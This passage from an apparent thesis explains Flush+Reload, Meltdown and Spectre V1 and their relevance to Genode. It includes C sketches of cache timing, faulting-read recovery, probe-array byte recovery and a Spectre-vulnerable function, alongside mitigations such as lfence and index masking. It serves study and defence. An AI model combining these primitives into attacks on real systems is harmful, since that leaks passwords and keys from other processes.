The attack Yarom and Falkner developed works by evicting a specific memory line using clflush and subsequently letting the victim execute. After the victim has executed, the attacker checks whether the evicted line is once again in the cache. This check is done by defining a machine-specific time threshold below which accesses are considered cache hits. Yarom and Falkner profiled cache misses using clflush to define the threshold. Zhou et al. [50] presented a method to choose the threshold for Flush+Reload and concluded that the threshold should be below, but close to, the lower boundary of DRAM access times.
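A minimal sketch of one Flush+Reload round, assuming GCC or Clang on x86-64 and a line `addr` that is shared between attacker and victim. The threshold is calibrated by profiling cache misses with clflush, as Yarom and Falkner did, and is placed near the low end of the measured miss times, in the spirit of Zhou et al.'s recommendation. Choosing the 1st percentile of the misses, modelling the victim as a callback, and the names `reload_cycles`, `flush_line`, `calibrate_threshold` and `flush_reload_round` are our assumptions.

```c
#include <stdint.h>
#include <stdlib.h>
#include <x86intrin.h>

/* Time one load of addr in TSC cycles. */
static uint64_t reload_cycles(const volatile uint8_t *addr) {
    unsigned int aux;
    _mm_lfence();
    uint64_t start = __rdtscp(&aux);
    _mm_lfence();
    uint8_t value = *addr;
    (void)value;
    _mm_lfence();
    return __rdtscp(&aux) - start;
}

/* Evict addr from the cache hierarchy and wait for the flush to finish. */
static void flush_line(const volatile uint8_t *addr) {
    _mm_clflush((const void *)addr);
    _mm_mfence();
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Profile n cache misses and return their 1st-percentile access time,
 * i.e. a value close to the lower boundary of DRAM access times. */
static uint64_t calibrate_threshold(const volatile uint8_t *addr, size_t n) {
    uint64_t *misses = malloc(n * sizeof *misses);
    if (misses == NULL)
        return 0;
    for (size_t i = 0; i < n; i++) {
        flush_line(addr);
        misses[i] = reload_cycles(addr);
    }
    qsort(misses, n, sizeof *misses, cmp_u64);
    uint64_t threshold = misses[n / 100];
    free(misses);
    return threshold;
}

/* One round: flush, let the victim run, then reload.
 * Returns 1 if the reload was a cache hit, i.e. the victim touched addr. */
static int flush_reload_round(const volatile uint8_t *addr, uint64_t threshold,
                              void (*victim)(void)) {
    flush_line(addr);
    victim();
    return reload_cycles(addr) < threshold;
}
```

In a real attack the victim runs in another process and the attacker simply waits between the flush and the reload instead of calling the victim; a return value of 1 means the victim accessed the shared line during that interval.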

Yarom and Falkner note that some CPU optimizations, e.g. speculative execution or data prefetching, may result in false positives. Consequently, strategies to filter these false positives are desirable; however, Yarom and Falkner do not suggest such methods.

2.3.1 Shared Memory

One requirement for Flush+Reload is the availability of shared memory between the attacker and the victim. Multiple processes can have access to a shared physical memory space in modern OSs1. One reason for using shared memory is to optimize memory usage when multiple processes use the same library [31]. The OS may load a library once into physical memory and reference that memory with different virtual addresses in each process. Hence, instead of every process loading the library into its own user space, the library is only loaded once and then shared by multiple processes. User processes can also use shared memory for IPC in some OSs [31].
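As a hedged illustration of shared memory on a POSIX system such as Linux (not Genode), the sketch below maps one anonymous page with `MAP_SHARED` before `fork()`, so that parent and child reference the same physical page through their own virtual mappings and a write by one is visible to the other. `MAP_ANONYMOUS` is not part of older POSIX versions but is supported by Linux and the BSDs; the function name `child_writes_parent_reads` is hypothetical.

```c
#define _DEFAULT_SOURCE /* expose MAP_ANONYMOUS with glibc in strict modes */
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Map one shared page, let a child process write to it, and return what the
 * parent reads back afterwards (or -1 on error). */
static int child_writes_parent_reads(uint8_t value) {
    long page_size = sysconf(_SC_PAGESIZE);
    uint8_t *page = mmap(NULL, (size_t)page_size, PROT_READ | PROT_WRITE,
                         MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        munmap(page, (size_t)page_size);
        return -1;
    }
    if (pid == 0) {          /* child: write through its own mapping */
        page[0] = value;
        _exit(0);
    }
    waitpid(pid, NULL, 0);   /* parent: wait until the child has written */
    int result = page[0];    /* visible because the physical page is shared */
    munmap(page, (size_t)page_size);
    return result;
}
```

With `MAP_PRIVATE` instead of `MAP_SHARED`, the child's write would go to a private copy of the page and the parent would still read 0.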

This mechanism for optimizing the use of shared libraries has been exploited by Yarom and Falkner [48] to extract encryption keys via a Flush+Reload side channel.

Genode has a strict separation between its processes and should, therefore, not optimize memory usage by sharing memory [7]. However, a Flush+Reload channel may still be used between two processes sharing memory for IPC2.

1M. T. Jones. Anatomy of Linux dynamic libraries. 2008. URL: https://www.ibm.com/developerworks/linux/library/l-dynamic-libraries/ (visited on 2019-01-17).






2.3.2 Preventing Data Prefetching

Several techniques have been shown to be effective at preventing data prefetching. Reading in randomized order or traversing a random-order linked list are techniques which have been suggested by Liu et al. [32] to prevent data prefetching. Kocher et al. [24], although not explicitly stated, utilize a form of strided reads in their POC, thus preventing data prefetching. We will denote the form of strided reads used by Kocher et al. as Strided Read Generators (SRGs), which can be constructed as

$$\mathit{xs}_i = (a i + b) \bmod m$$

where

$$a \equiv 1 \pmod{p}$$

for all prime factors $p$ of $m$. This condition guarantees that $a$ is coprime to $m$, so that $i \in \{0, 1, \ldots, m-1\}$ visits every index in $[0, m)$ exactly once. For example, choosing $a$, $b$ and $m$ as

$$\begin{cases} a = 127 \\ b = 0 \\ m = 256 \end{cases}$$

gives the sequence $\mathit{xs}_i \in \{0, 127, 254, 125\}$ from the sequence $i \in \{0, 1, 2, 3\}$.
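The generator can be checked numerically. A minimal sketch, assuming unsigned arithmetic and m > 0: `srg` evaluates (a·i + b) mod m, and `srg_is_permutation` confirms that i = 0 to m−1 produces every index in [0, m) exactly once, which holds whenever gcd(a, m) = 1 (in particular when a ≡ 1 (mod p) for every prime factor p of m). Both function names are hypothetical.

```c
#include <stdbool.h>
#include <stdlib.h>

/* Strided read generator: the i-th index to read, (a*i + b) mod m. */
static unsigned srg(unsigned a, unsigned b, unsigned m, unsigned i) {
    return (unsigned)(((unsigned long long)a * i + b) % m);
}

/* True if i = 0..m-1 maps onto every index in [0, m) exactly once. */
static bool srg_is_permutation(unsigned a, unsigned b, unsigned m) {
    bool *seen = calloc(m, sizeof *seen);
    if (seen == NULL)
        return false;
    bool ok = true;
    for (unsigned i = 0; i < m && ok; i++) {
        unsigned x = srg(a, b, m, i);
        if (seen[x])
            ok = false;      /* an index was produced twice */
        seen[x] = true;
    }
    free(seen);
    return ok;
}
```

With a = 127, b = 0 and m = 256 the first generated indices are 0, 127, 254 and 125, so consecutive reads land far apart, which makes the access pattern hard for a stride prefetcher to follow. An even multiplier such as 128 shares the factor 2 with 256 and fails the permutation check.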

2.4 Meltdown

Meltdown is a microarchitectural attack leveraging OOE in some modern processors to leak memory via a cache covert channel. OOE is used to modify the contents of the cache; subsequently, the altered cache state is read via a covert channel [31].

Lipp et al. [31] describe two practical Meltdown attacks. The first attack showed how an attacker could read passwords stored by Firefox running on the same machine [31]. The second attack demonstrated how an attacker could exploit a system to dump the memory of another process, even with Kernel Address Space Layout Randomization (KASLR) active [31]. KASLR is a mechanism which randomizes the kernel-space memory layout at boot time [9].

2.4.1 Virtual Address Space

The process executing the Meltdown attack is required to have a virtual memory address corresponding to the physical memory address where the targeted data is located. Virtual memory is designed to isolate processes from each other. Virtual memory also acts as an abstraction from hardware and physical memory, exposing a conceptually infinite space of memory [15, p.38].

Hat [15] explains how the virtual address is split, one part indexing a page directory entry and the other indexing an offset within that page. Multiple page directory entries may resolve to the same physical memory page. Shared memory is commonly implemented in this way, i.e. by mapping multiple virtual addresses to the same physical memory address [15, p.38].

Figure 2.1 shows the virtual memory map of a process running on 64-bit Linux. The process’s memory space, i.e. user space, is located in the lower address range and the kernel in the highest address range. In between user and kernel space is unused address space. The layout of the kernel space is the same for all user processes in Linux. This is done to remove the need to switch the page tables used by the Memory-Management Unit (MMU) when switching to kernel mode, which is a costly operation3.
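To make the split concrete, the sketch below assumes x86-64 with 4-level paging and 4 KiB pages, where the lower 48 bits of a virtual address are split into four 9-bit table indices and a 12-bit page offset. This is more detailed than the two-part description above; the struct `va_split_t` and the function `split_virtual_address` are hypothetical names.

```c
#include <stdint.h>

/* Indices into the four page-table levels plus the offset within the page,
 * assuming x86-64 4-level paging with 4 KiB pages. */
typedef struct {
    unsigned pml4;    /* bits 47..39 */
    unsigned pdpt;    /* bits 38..30 */
    unsigned pd;      /* bits 29..21 */
    unsigned pt;      /* bits 20..12 */
    unsigned offset;  /* bits 11..0  */
} va_split_t;

static va_split_t split_virtual_address(uint64_t va) {
    va_split_t s;
    s.pml4   = (unsigned)((va >> 39) & 0x1ff);
    s.pdpt   = (unsigned)((va >> 30) & 0x1ff);
    s.pd     = (unsigned)((va >> 21) & 0x1ff);
    s.pt     = (unsigned)((va >> 12) & 0x1ff);
    s.offset = (unsigned)(va & 0xfff);
    return s;
}
```

For example, the address 0x7ffffdf9d580 used in Listing 2.4 splits into the indices 255, 511, 495 and 413 and the offset 0x580. Two processes share memory when their page tables lead, through different indices, to the same physical page, while the 12-bit offset is identical in both mappings.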

3J. Corbet. KAISER: hiding the kernel from user space [LWN.net]. Nov. 2017. URL: https://lwn.net/Articles/738975/ (visited on 2019-01-22).


Figure 2.1: A model of virtual memory composition: user space from 0x0000000000000000 to 0x0000008000000000, unused space up to 0xFFFFFF8000000000, and kernel space up to 0xFFFFFFFFFFFFFFFF.

2.4.2 Meltdown Attack Description

An attacker can read some data and use this data as an index into an array. The attacker can then use a cache covert channel to determine which index of the array was accessed, and thereby what the initial data was.

The Meltdown attack is performed in this way: an array is indexed with the value from an illegal memory access. On most kernels, the illegal access raises a segmentation fault, preventing the address from being read and triggering signal handling. However, if the CPU uses OOE, the array may be indexed with the data before the signal handling occurs [31]. Listing 2.4 shows an example of how the Meltdown attack may work. Here, the data from the address 0x7ffffdf9d580 is saved to a variable with which the array data is indexed. If OOE is available, the access to data may occur before the signal handling and leave the accessed element in the cache.

For Meltdown to read a memory address, that address needs to be mapped into theaddress space of the user process, i.e., the user process needs to have access to virtual memorycorresponding to the physical memory of the process under attack [31].

Listing 2.4: Meltdown Memory Access

// Illegal memory read; unsigned so that values 128-255 cannot
// produce a negative index below
unsigned char ill = *(volatile unsigned char *) 0x7ffffdf9d580;
// The PAGE_SIZE stride prevents the prefetcher from fetching
// adjacent entries, so that the exact value of ill can be
// identified with Flush+Reload
data[ill * PAGE_SIZE] = 0;

2.4.3 Proof-Of-Concept Implementation

Lipp et al. [31] created a Proof-Of-Concept (POC) implementation of Meltdown, which can be found on Github4. The control flow of the attack is implemented as follows:

1. Flush the shared array from the cache.

2. Access shared memory array at an address calculated based on the value at the targetedaddress.

3. Recover from the triggered segmentation fault.

4. Test indices in the shared array for a cache hit.
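Step 3 can be illustrated on its own. A minimal sketch for Linux or another POSIX system, assuming recovery through a custom SIGSEGV handler that jumps back with `siglongjmp` (a common approach, not necessarily the exact code of the IAIK POC). It reads from an address that may be inaccessible and reports whether execution was recovered; it performs no speculative access and no covert-channel measurement. The function name `faulting_read_recovers` is hypothetical.

```c
#define _DEFAULT_SOURCE /* expose sigaction and sigsetjmp under strict ISO C modes (glibc) */
#include <setjmp.h>
#include <signal.h>
#include <string.h>

static sigjmp_buf recovery_point;

/* SIGSEGV handler: jump back to the recovery point instead of terminating. */
static void segv_handler(int sig) {
    (void)sig;
    siglongjmp(recovery_point, 1);
}

/* Read one byte from addr. Returns 1 if the read raised SIGSEGV and execution
 * was recovered, 0 if the read succeeded, and -1 if no handler was installed. */
static int faulting_read_recovers(const volatile char *addr) {
    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = segv_handler;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGSEGV, &sa, &old) != 0)
        return -1;

    volatile int recovered = 0;
    if (sigsetjmp(recovery_point, 1) == 0) {
        char value = *addr;          /* may raise SIGSEGV */
        (void)value;
    } else {
        recovered = 1;               /* reached through siglongjmp in the handler */
    }
    sigaction(SIGSEGV, &old, NULL);  /* restore the previous handler */
    return recovered;
}
```

Passing a non-zero second argument to `sigsetjmp` saves the signal mask, so SIGSEGV is unblocked again after the jump and the function can be called repeatedly. Each recovery still costs a kernel round trip for signal delivery, which is why TSX-based recovery is faster where it is available.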

4https://github.com/IAIK/meltdown


Several tools have been used to execute these steps. To flush the shared array, the clflush instruction has been used [31]. Shared memory is used in the case of Flush+Reload, which is a well-performing side channel [48]. Recovering from the segmentation fault can be handled in Linux via custom signal handlers or, more efficiently, via Intel TSX [31]. For the last step, testing values for cache hits, two methods are presented here: testing after each read, and testing all values after a single read. The latter is discussed in two versions: testing all values using a mixed-order iteration, and testing all values using a large offset. In addition, it is necessary to accurately determine from which cache level a memory access was served. To do this, a high-resolution timer like the TSC can be used [31]. Such timers are, however, not strictly necessary, as there are techniques to construct a high-resolution timer from lower-resolution ones [41].
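The last step, testing all values after a single read using a mixed-order iteration, can be sketched as follows, assuming GCC or Clang on x86-64. Each possible byte value owns one 4 KiB page of a probe array (the PAGE_SIZE stride from Listing 2.4), the pages are visited in the order (167·i + 13) mod 256 so that the prefetcher cannot predict the next page, and the fastest page is reported. The constants and the names `probe_cycles`, `flush_probe_array` and `recover_byte` are assumptions; a more careful implementation would also compare the fastest time against a threshold.

```c
#include <stdint.h>
#include <x86intrin.h>

#define PROBE_PAGE 4096   /* one page per possible byte value */
#define PROBE_VALUES 256

/* Time one load of addr in TSC cycles. */
static uint64_t probe_cycles(const volatile uint8_t *addr) {
    unsigned int aux;
    _mm_lfence();
    uint64_t start = __rdtscp(&aux);
    _mm_lfence();
    uint8_t value = *addr;
    (void)value;
    _mm_lfence();
    return __rdtscp(&aux) - start;
}

/* Step 1: flush the first line of every probe page from the cache. */
static void flush_probe_array(const volatile uint8_t *probe) {
    for (int v = 0; v < PROBE_VALUES; v++)
        _mm_clflush((const void *)&probe[v * PROBE_PAGE]);
    _mm_mfence();
}

/* Step 4: reload all pages in mixed order and return the byte value whose
 * page was fastest to access, i.e. the most likely cache hit. */
static int recover_byte(const volatile uint8_t *probe) {
    uint64_t best_time = UINT64_MAX;
    int best_value = -1;
    for (int i = 0; i < PROBE_VALUES; i++) {
        int v = (i * 167 + 13) & (PROBE_VALUES - 1); /* mixed-order permutation */
        uint64_t t = probe_cycles(&probe[v * PROBE_PAGE]);
        if (t < best_time) {
            best_time = t;
            best_value = v;
        }
    }
    return best_value;
}
```

Every page of the probe array must be written once beforehand; otherwise untouched zero-filled pages may all be backed by the same physical frame and would look like hits together. Repeating flush, access and recovery several times and taking a majority vote reduces errors caused by noise.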

An attacker targeting Genode and microkernels faces some limitations related to the tools discussed above. Handling of certain signals, including segmentation faults, is not as flexible on Genode as needed [7].

Requiring the targeted data to be cached may be an unreasonable prerequisite. Intel TSX has been used in place of signal handling to recover from the segmentation fault, and this method has proven the most effective [31]. The reason is that there is hardware support for reverting a transaction, so the OS cannot observe that a faulty access was made during the transaction [31].

2.4.4 Mitigations

There have been efforts to mitigate both Meltdown and Spectre in software; consequently, this section presents which mitigations exist, how they work and how they are applied.

Lipp et al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed (KAISER) patch mitigates Meltdown by removing the kernel mapping from user space and, therefore, removing Meltdown’s ability to access kernel memory [31]. KAISER has since been renamed Kernel Page-Table Isolation (KPTI) and was introduced in version 4.15-rc4 of the Linux kernel5. Prout et al. [36] found that KPTI slowed down disk accesses by up to 50% due to the increased execution time of a user-to-kernel context switch.

2.4.5 Meltdown on Genode

Genode’s founder Feske6 has discussed the implications of Meltdown on Genode. Feske stated that due to the minimalistic responsibilities of the microkernel, there is not as much information to leak from the kernel. Furthermore, the only memory pages shared between user applications and the kernel are thread control blocks. This limits the information accessible through the shared LLC. Feske also suggested that the Meltdown attack should be tested on different kernels to get a complete picture of what information can be leaked.

Genode’s signal handling is not as adaptable as that of Linux. An attacker cannot install a custom handler for segmentation faults [7] and, consequently, cannot recover from a segmentation fault in this way.

2.5 Spectre

Spectre is a class of microarchitectural attacks leveraging speculative execution on some modern processors [24]. Spectre attacks can be used to read memory from other user processes or the kernel. Kocher et al. [24] described four different attacks; in this thesis, we focus on the attack exploiting conditional branches, Spectre Version 1 (Spectre V1).

5J. Corbet. The current state of kernel page-table isolation [LWN.net]. Dec. 2017. URL: https://lwn.net/Articles/741878/ (visited on 2019-01-23).



2.5.1 Spectre V1 Attack Description

Spectre V1 exploits speculative execution to bypass conditional branches. To execute Spectre V1, an attacker first needs to find a vulnerable function in another process. One example of a vulnerable function can be seen in Listing 2.5. For this example to work, shared_array needs to point to memory shared by the attacker and the victim. This example function is vulnerable to an SCA which can allow an attacker to read private_array, and by using Spectre V1, an attacker could also read data outside private_array.

By calling the function read_data many times with idx smaller than the size of private_array, an attacker can train the CPU to speculatively evaluate the condition on line 2 to true and, furthermore, execute line 3. The attacker then calls read_data with an idx outside private_array. The speculative execution can be triggered if the variable size_of_private_array is not cached and, therefore, takes hundreds of CPU cycles to fetch. If the CPU, after this speculative execution, evaluates the condition on line 2 to false, line 3 is never committed. The speculative execution may still have left data in the cache, which may be read by the attacker using Flush+Reload or another cache-based SCA.

Listing 2.5: A function which is vulnerable to Spectre V1.

1 void read_data(unsigned int idx) {
2   if (idx < size_of_private_array)
3     dummy = shared_array[private_array[idx]];
4 }

2.5.2 Spectre V1 Mitigations

Spectre V1 relies on speculative execution for its exploit; thus, a straightforward approach to mitigation would be to disable speculative execution. Disabling speculative execution may, however, degrade performance according to Kocher et al. [24]. Another strategy proposed by Kocher et al. is to apply a bitmask to the index, effectively forcing the index to be within the bounds of the array. Because the masked index depends on the result of the bounds computation, this method does not allow an invalid array access even during speculative execution [19].

2.5.2.1 Preventing Speculative Execution

Intel recommends the use of the lfence instruction to prevent speculative execution, as it serializes instructions and performs better than other serializing instructions [18]. Listing 2.6 shows how the lfence instruction can be applied to mitigate Spectre V1 in the vulnerable function.

Listing 2.6: A function which was vulnerable to Spectre V1 after the load fence mitigation has been applied.

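#include <stddef.h>
#include <x86intrin.h>    // _mm_lfence

extern int array[];
extern size_t array_size;
void do_something(int value);

void victim(size_t idx) {
    if (idx < array_size) {
        _mm_lfence();         // The load below cannot execute until
        int foo = array[idx]; // the condition has been evaluated
        do_something(foo);
    }
}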

Microsoft has added a feature to its MSVC compiler (/Qspectre) which allows the compiler to insert a speculative code execution barrier, similar to lfence. According to Microsoft, this mitigation should have a negligible impact on performance7.

7Microsoft. “/Qspectre”. In: (Oct. 2018). URL: https://docs.microsoft.com/en-us/cpp/build/reference/qspectre?view=vs-2019 (visited on 2019-04-16).


2.5.2.2 Index Bitmasking

Stuart [43] showed a Spectre V1 mitigation which uses bit operations to remove the possibility of indexing outside the array. Listing 2.7 shows an example of a function which uses these bit operations to mitigate a Spectre V1 attack. Line 5 of the listing sets mask to a negative number if idx >= size, since size - 1 - idx then wraps around to a value with its most significant bit set. The OR with idx on line 5 also makes mask negative if idx itself is larger than LONG_MAX, in which case the subtraction alone could wrap around to a small non-negative value; this prevents an attack from overflowing the conversion8. After the right shift on line 7, mask contains only 1s if idx >= size and only 0s otherwise. This code depends on right shifts of negative numbers being arithmetic, which is implementation-defined9 and thus depends on the compiler and architecture. Line 9 inverts mask to simplify the operation on line 11, where idx is AND:ed with either 0s, if idx >= size, or 1s otherwise. Hence, the array cannot be indexed with a value greater than or equal to size.

Listing 2.7: A function which was vulnerable to Spectre V1 after the bitmask mitigation has been applied.

1 void victim(unsigned long idx) {
2   // unsigned long size
3   if (idx < size) {
4     // Set mask to a negative number if idx >= size
5     long mask = idx | (size - 1 - idx);
6     // mask = 0xFFF... if mask < 0 else 0x000...
7     mask >>= (sizeof(long) * 8 - 1); // arithmetic right shift
8     // mask = 0xFFF... if mask = 0x000... else 0x000...
9     mask = ~(mask);
10    // idx & mask = idx if mask = 0xFFF... else 0
11    int foo = array[idx & mask];
12  }
13 }
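The masking arithmetic of Listing 2.7 can be isolated and tested on its own. A minimal sketch, assuming a two's-complement target where right-shifting a negative long is arithmetic (true for GCC and Clang on common architectures, but implementation-defined in C) and that size is at most LONG_MAX; the name `index_mask` is hypothetical. The returned mask is all 1s when idx < size and 0 otherwise.

```c
#include <limits.h>

/* Returns ~0UL when idx < size and 0 otherwise, without a branch.
 * Assumes size <= LONG_MAX and an arithmetic right shift for long. */
static unsigned long index_mask(unsigned long idx, unsigned long size) {
    /* The sign bit is set if size - 1 - idx wrapped around (idx >= size)
     * or if idx itself is larger than LONG_MAX. */
    long mask = (long)(idx | (size - 1 - idx));
    /* Smear the sign bit: -1 (all 1s) if negative, 0 otherwise. */
    mask >>= (sizeof(long) * CHAR_BIT - 1);
    /* Invert so that in-bounds indices get all 1s. */
    return (unsigned long)~mask;
}
```

In Listing 2.7 the mask would be applied as `array[idx & index_mask(idx, size)]`, so an out-of-bounds idx becomes 0 even if the bounds check is bypassed speculatively.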

A mitigation similar to the one described in Listing 2.7 has been implemented in the Linux kernel10, see Listing 2.8. This mitigation uses two instructions to perform the bit masking. The first instruction, "cmp %1,%2", computes idx - size (the operands are in AT&T order) and sets the carry flag to 1 if idx < size. The next instruction, "sbb %0,%0;", sets mask to -1 if the carry flag is set, or 0 otherwise. Consequently, array_index_mask_nospec returns 0 if idx >= size and all 1s (0xFFFFFFFFFFFFFFFF on x86-64) otherwise. AND:ing idx with the returned value gives idx if idx is in range and 0 otherwise.

8J. Corbet. Meltdown/Spectre mitigation for 4.15 and beyond [LWN.net]. Jan. 2018. URL: https://lwn.net/Articles/744287/ (visited on 2019-03-25).

9Arithmetic operators. URL: https://en.cppreference.com/w/c/language/operator_arithmetic (visited on 2019-03-25).

10D. Williams. x86: Implement array_index_mask_nospec. Jan. 2018. URL: https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=babdde2698d482b6c0de1eab4f697cf5856c5859 (visited on 2019-03-26).


Listing 2.8: A function which was vulnerable to Spectre V1 after the built-in Linux kernel mitigation has been applied.

/* Source from
 * https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git
 * commit = babdde2698d482b6c0de1eab4f697cf5856c5859
 */
static inline unsigned long
array_index_mask_nospec(unsigned long index, unsigned long size) {
    unsigned long mask;
    asm ("cmp %1,%2;" "sbb %0,%0;"
         :"=r" (mask) :"r"(size),"r" (index)
         :"cc");
    return mask;
}

extern unsigned long size;
extern int array[];

void victim(unsigned long idx) {
    if (idx < size) {
        idx &= array_index_mask_nospec(idx, size);
        int foo = array[idx];
        (void)foo;
    }
}
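The cmp/sbb sequence can be exercised directly. A minimal sketch, assuming GCC or Clang on x86-64; the wrappers `mask_nospec_x86` and `clamp_index` are our own names, modelled on the kernel function. Because AT&T syntax computes `%2 - %1`, i.e. idx - size, the carry flag is set exactly when idx < size, and `sbb %0,%0` turns that borrow into an all-1s mask.

```c
/* Returns ~0UL if idx < size and 0 otherwise, using the cmp/sbb idiom.
 * x86-64 only; the "cc" clobber tells the compiler the flags are modified. */
static inline unsigned long mask_nospec_x86(unsigned long idx, unsigned long size) {
    unsigned long mask;
    __asm__ ("cmp %1,%2; sbb %0,%0;"
             : "=r" (mask)
             : "r" (size), "r" (idx)
             : "cc");
    return mask;
}

/* Clamp idx to 0 when it is out of bounds, without a conditional branch. */
static inline unsigned long clamp_index(unsigned long idx, unsigned long size) {
    return idx & mask_nospec_x86(idx, size);
}
```

Since `sbb %0,%0` computes 0 - CF regardless of the register's previous contents, the output may safely share a register with an input, which is why no early-clobber constraint is needed.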

2.6 Performance

In order to evaluate the performance impact of mitigations against Spectre on RPC, a basic understanding of IPC performance and microkernel performance is needed. In addition, we present criticism against microkernel performance and the performance of monolithic designs.

2.6.1 Microkernel Performance

Lameter [26] has compared the performance of a monolithic Linux kernel with that of an abstract microkernel and discusses the inability of microkernels to scale with an increasing number of processes.

2.6.2 IPC Performance

Immich et al. [17] analyzed IPC performance by measuring the time it took for two processes to exchange messages over different IPC mechanisms; to get the current time, the function gettimeofday was used since it provides microsecond resolution. A similar study has been done for Sel4’s current IPC [49], which examined the overhead of allocating different IPC mechanisms as well as the execution time of using them.
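As a hedged illustration of this measurement method, the sketch below times one-byte round trips between two processes over a pair of POSIX pipes. It swaps gettimeofday for `clock_gettime(CLOCK_MONOTONIC)`, which is not affected by wall-clock adjustments; pipes merely stand in for whichever IPC mechanism is under test, and the function name `pipe_round_trip_ns` is hypothetical.

```c
#define _DEFAULT_SOURCE /* expose clock_gettime under strict ISO C modes (glibc) */
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/* Average round-trip time in nanoseconds for `rounds` one-byte ping-pong
 * exchanges between a parent and a child process, or -1.0 on error. */
static double pipe_round_trip_ns(int rounds) {
    int to_child[2], to_parent[2];
    if (rounds <= 0 || pipe(to_child) != 0)
        return -1.0;
    if (pipe(to_parent) != 0) {
        close(to_child[0]);
        close(to_child[1]);
        return -1.0;
    }

    pid_t pid = fork();
    if (pid < 0) {
        close(to_child[0]); close(to_child[1]);
        close(to_parent[0]); close(to_parent[1]);
        return -1.0;
    }
    if (pid == 0) {                      /* child: echo every byte back */
        char c;
        close(to_child[1]);
        close(to_parent[0]);
        while (read(to_child[0], &c, 1) == 1)
            if (write(to_parent[1], &c, 1) != 1)
                break;
        _exit(0);
    }

    close(to_child[0]);
    close(to_parent[1]);
    struct timespec start, end;
    char c = 'x';
    int ok = 1;
    clock_gettime(CLOCK_MONOTONIC, &start);
    for (int i = 0; i < rounds && ok; i++)
        ok = write(to_child[1], &c, 1) == 1 && read(to_parent[0], &c, 1) == 1;
    clock_gettime(CLOCK_MONOTONIC, &end);

    close(to_child[1]);                  /* EOF makes the child exit */
    close(to_parent[0]);
    waitpid(pid, NULL, 0);
    if (!ok)
        return -1.0;
    double elapsed = (double)(end.tv_sec - start.tv_sec) * 1e9
                   + (double)(end.tv_nsec - start.tv_nsec);
    return elapsed / rounds;
}
```

Averaging over many rounds hides the coarse resolution of the clock relative to a single exchange, which is also why microsecond-resolution timers such as gettimeofday can still be used for this kind of benchmark.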

2.7 Related Work

Genode is not the only approach to process separation and resource limitation; for a good understanding of the benefits and disadvantages of microkernels, the alternative solutions need to be understood. Besides, there is a body of work relating to Genode and security which is not specifically about microarchitectural attacks but which does motivate investigating them.


2.7.1 Genode

Genode has seen work related to security. Constable et al. [5] worked on extending formal Sel4 verification to a Virtual Machine Monitor (VMM) running on Genode. Lange et al. [28] used Genode and a microkernel to form a secure encapsulation of smartphone OSs. Waddington et al. [46] implemented a high-performance web cache using Genode+Fiasco.OC. Hamad and Prevelakis [13] measured IPsec performance on Genode running on Raspberry Pis.

Several other works have focused on using Genode as a means to achieve a secure OS. Brito et al. [1] used Genode as a secure kernel base to process images securely in an ARM TrustZone cloud environment. Ribeiro et al. [38] used Genode to construct a TrustZone-backed database management system. Ramos [37] proposed the development of a toolkit, using Genode as a base, to ease the development of TrustZone projects. Harp et al. [14] recommend ISOSCELES, a reference architecture for medical devices building on Genode, using either Nova or Sel4 as the microkernel base. Hamad et al. [12] used Genode to implement a secure intra-vehicle communication framework, utilizing its IPC mechanisms for efficient message passing.

Genode has seen little work related to microarchitectural attacks and side channels. Schmidt et al. [39] constructed a covert channel in Genode which exploited a software cache to construct a timing channel. However, to the best of the authors’ knowledge, there has been no other work relating to SCAs in Genode.

2.7.2 Side Channels

Xiao et al. [47] demonstrate a covert channel using the execution time of write accesses to shared memory pages. They leverage the Copy-On-Write (COW) technique, which is commonly used in shared memory implementations. COW copies the requested page and writes to the copy on demand; measuring the execution time of a write thus reveals whether a page is shared or not [47]. Using this technique, Xiao et al. [47] also demonstrate examples of a covert channel transmitting 50-90 bps in practical applications.

Pessl et al. [35] present a cross-CPU covert channel utilizing the varying access times of memory banks in DRAM. They demonstrated a channel with a capacity of 2.1 Mbps and an error probability of 1.8%, and a cross-VM channel with a capacity of 596 kbps and an error probability of 0.4%.

2.7.3 Microarchitectural Attacks

Mcilroy et al. [33] examined the deep-seated implications of how Spectre and incorrect hardware models affect confidentiality-enforcing programming languages. Mcilroy et al. showed that these confidentiality guarantees are completely compromised by Spectre. Koruyeh et al. [25] showed that the Return Stack Buffer (RSB) could be exploited instead of the BPU, thus introducing a class of SpectreRSB attacks. Koruyeh et al. were not successful in demonstrating these attacks on ARM and AMD CPUs. However, ARM and AMD CPUs also utilize an RSB and may therefore be vulnerable.

There has also been work examining SCAs targeting ARM TrustZone. Lapid and Wool [29] mounted a cache side-channel attack against the ARM32 AES implementation used by the Keymaster trustlet. Another work by Bukasa et al. [3] showed the ineffectiveness of TrustZone in preventing power-analysis SCAs.

Microarchitectural attacks are also a quickly progressing field. A recent work by Schwarz et al. demonstrated the ZombieLoad attack, a new type of microarchitectural attack which exploits a fill buffer to read data from other processes [40]. This fill buffer is a type of load queue which is shared between hyperthreads. Under certain circumstances, this buffer can serve a load with data belonging to a load initially issued on the sibling hyperthread, and can thereby leak data from loads issued by other processes [40].


2.7.4 Linux Control Groups

The Linux kernel implements limitation of resources in the form of control groups (cgroups).According to the man-page for cgroups:

"A cgroup is a collection of processes that are bound to a set of limits or parametersdefined via the cgroup filesystem." [4]

Cgroups can restrict the use of resources like CPU and memory for processes in a cgroup.Cgroups may also provide guarantees of CPU time for processes in a group. However, unlikeGenode, cgroups do not allow non-root processes in a cgroup to have children of their own[4].

2.7.5 Security by Virtualization

Using a small kernel is not the only way to potentially enhance the security of a system. Another option is to use different virtual systems to separate processes. The virtual systems need to run on a hypervisor, which may itself be attacked. Thongthua and Ngamsuriyaroj [44] discuss some weaknesses they found in popular hypervisor software. Furthermore, the abstraction of virtualization does not prevent microarchitectural attacks such as Meltdown or Spectre [31, 24]. Irazoqui et al. [21] recovered an AES key in a cross-VM setup using an SCA that abused the LLC. Since the LLC was used, the attack does not depend on the virtual machines running on the same core. Virtualization also adds the overhead of handling multiple OSs running on the same hardware.


3 Method

